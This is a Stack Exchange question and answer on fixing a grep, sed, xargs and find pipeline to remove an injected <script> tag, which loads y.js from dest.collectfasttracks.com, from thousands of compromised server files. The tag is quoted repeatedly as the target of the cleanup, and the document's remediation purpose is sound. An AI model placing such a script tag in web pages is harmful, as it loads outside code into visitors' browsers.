# Remove Strings from files using sed and grep

Tags: linux, command-line, bash, grep, sed

we are trying to remove a single line of injection code in thousand files of our server of these thing using grep and sed:

```
<script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'></script>
```

Based on our search, it seems only injected the first part of the file directly.

The code we test are:

```
grep -r -H "collectfasttracks" * | xargs sed -i '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{} \;
```

But it failed with the error:

```
sed: -e expression #1, char 16: extra characters after command
```

Perhaps we missed something in the sed command.

Answer (score 0):

More than one issue here.

1. Every single-quote (`'`) in your command is seen by the shell and removed during the quote removal phase. See the output of

   ```
   printf '%s\n' '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{}
   ```

   There are no single-quotes in the output, this means no single-quote got to `printf`. It seems you tried to escape some single-quotes with a slash (`/`). Problems:

   - the right character to escape anything is backslash (`\`);
   - single-quoted backslash escapes nothing anyway because there is no escaping in single-quotes, the shell considers any single-quoted string literally.

   To make a single-quote character survive the quote removal phase you need to double-quote it. If you need to single-quote other parts of the string, proceed like this:

   ```
   printf '%s\n' 'single-quoted part'"'"'single-quoted as well'"'"'and again single-quoted'
   ```

   Here `printf` is just to show which quotes survive and get to the command. In practice you will use `sed`, `xargs` or whatever.

   If you can afford double-quoting the entire string, it's lot more readable:

   ```
   printf '%s\n' "double-quoted part'double-quoted as well'and again double-quoted"
   ```

   Note `double-quoted as well` [*is* double-quoted](https://superuser.com/a/1404245/432690) despite the neighboring single-quotes.

   In your case I think you can double-quote the entire string. In general one should remember a shell parsing a double-quoted string treats backquote (`` ` ``) dollar-sign (`$`) and backslash `\` specially.
2. `sed` works with regular expressions and you seem aware you need to escape some characters (e.g. `.`) to make the tool treat them literally. But again you used mostly `/`, it has nothing to do with escaping. Surprisingly few times you used `\`.

   Note the previous point was about escaping in the context of the shell; now we're talking about escaping in `sed`. These are two different issues. If you decide to double-quote the entire string then remember sometimes `\` is special to the shell in the first place. Compare [this question](https://superuser.com/q/1249828/432690). My answer there explains how both the shell and `echo` can treat `\` specially. In your case there's the shell and `sed` but in general the problem is similar because `sed` like `echo` can treat `\` specially.
3. It seems your general idea was to use `/pattern/ d` script for `sed`. If `pattern` contains slashes then you need to escape them. Not only you failed in escaping them, you introduced new slashes trying to "escape" other characters. In effect the actual pattern was just `<script type` and the following `=` was the command. The tool complained about what's after `=`.

   Your `pattern` contains slashes. To avoid the need for escaping them you can use another character while specifying the address. Compare [this answer](https://superuser.com/a/1530249/432690). E.g. the address specification can be like this:

   ```
   \@pattern@
   ```

   Now you don't need to escape slashes in `pattern` (but you need to escape `@` if any).
4. `{}` is concatenated with the preceding string. The `printf` in my first point shows this. I guess this was not your intention.
5. In your code `{}` is just literal `{}`. It would be different if you used `xargs -I{} …` or `xargs -i …` but you didn't. The `-i` after `sed` is not an option to `xargs`.
6. `\;` (or maybe even `{} \;`) seems to be taken from the syntax of `find … -exec … \;`. If your `sed` didn't throw an error, it would treat `;` as the name of a file to operate on.
7. `grep -r -H …` prints paths (filenames) *and* matching lines. You want `grep -r -l …` to get paths only.
8. `*` is expanded by the shell, it may trigger `argument list too long` error. You didn't get the error, so it's not an issue in your case. In general it can be, so using `.` instead of `*` may be a good idea. Differences:

   - Expansion of `*` omits dot files; traversal of `.` does not.
   - Expansion of `*` may pass a symlink as a command line argument to `grep`. By default `grep -r` skips symlinks unless they are provided explicitly in the command line.
9. If you want to use `*` anyway, consider `./*` instead. This is important in case `*` expands to something that looks like an option. Or [use `--`](https://unix.stackexchange.com/q/11376/108618).
10. If any filename contains a newline (in general filenames can), piping such string to a command that expects filenames as lines will make the command fail or misbehave. To avoid this you want to pass names as null-terminated strings, if only the tools you use support such mode of operation. Your `xargs` may support `-0` and your `grep` may support `-z` but it wont help because `-z` doesn't affect output of `grep -l` (at least this is the case with GNU `grep` in my Kubuntu; and it's not the only problem but it's enough). Instead of piping paths to `xargs`, sometimes it's better to use `find … -exec …`.
11. `xargs` interprets quotes and backslashes, unless you use `-0` (if supported) or `-d` (if supported). Paths in general may include quotes and/or backslashes. For this reason alone you do want to use `-0` even if newlines are not an issue. As stated above, `grep -l` doesn't generate null-terminated output, still you can use `xargs -d '\n'` (if `-d` is supported) to suppress interpretation of quotes and backslashes. This approach will not solve the problem with newlines in filenames but it will solve the problem of possible quotes or backslashes being interpreted by `xargs`.

---

Assuming you want `*` rather than `.` and there are no newlines in paths, this is the improved command:

```
grep -rl "collectfasttracks" ./* | xargs -d '\n' sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   "
```

If newlines can be an issue, a solution with `find` is the right one:

```
find ./* -type f -exec grep -q "collectfasttracks" {} \; -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +
```

It works because `-exec … \;` is also a test. In this case exit status `0` from `grep` means the test succeeded.

Note the solution with `xargs` runs exactly one `grep`. Then `xargs` passes as many paths to a single `sed` as possible; more `sed` processes will be spawned if needed. This will perform very well.

The solution with `find` spawns one `grep` per *any* file. Thanks to `-exec … {} +` (as opposed to `-exec … \;`) the number of `sed` processes will be as low as with `xargs`, still the massive number of `grep`s will slow the entire solution down. On the other hand this solution is very portable and not flawed when it comes to filenames (it will work with any filename(s)).

If you're sure there are many files with matches and only few files without, dropping `grep` may be a good idea:

```
find ./* -type f -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +
```

In this case `sed` will process few files unnecessarily, yet it may be faster than spawning one `grep` per file for many files.

Warning: All the above solutions are able to pass multiple arguments (paths to files) to `sed`. This is good for performance but my tests (with GNU sed 4.4) indicate that a problem with one file (e.g. inability to create a temporary file) may make the tool abort and not process remaining files. To process files totally independently you need one `sed` per file. You achieve this by `… | xargs -n 1 … sed …` or `find … -exec sed … {} \;` (i.e. `\;` instead of `+`).

Comment: i tried your solution of:

    find ./* -type f -exec sed -i "\@<script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'></script>@ d" {} +

it seems works fine, however does it work recursively? I can afford the extra load as long as the syntax works properly.

Comment: @Yohanes `find` works recursively, so yes, the whole solution works recursively. There are nuances regarding symlinks. See `man 1 find`, options `-H`, `-L`, `-P`.

Comment: i tried with a few more sample files, it seems to remove the line completely, like the case <script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'></script><!-- You don't belong here. --> then it would completely delete it. It should stop at <!--

Comment: @Yohanes Your question is about "removing a *line* of injection" and it seems you tried to use `sed '/pattern/ d'` which removes whole line(s). I assumed this is what you want. If you want to replace `pattern` with nothing, use `sed 's/pattern//'`.

Comment: i perhaps have a bit typo at first post that cause misleading, the injected code is injected right in the first character of file and blend with previous code of the file in the first line so i would need to remove that set of exact string without altering the next character.

Comment: @Yohanes Sigh. My answer answers the question as it is. You can change (edit) the question but changing the requirements after you received an answer is uncool. Do you need help in changing `'/pattern/ d'` to `sed 's/pattern//'`? The [already linked answer](https://superuser.com/a/1530249/432690) states it can be `sed 's|pattern||'` or `sed 's@pattern@@'`. In your case you would probably want `'1 s|^pattern||'` or similar.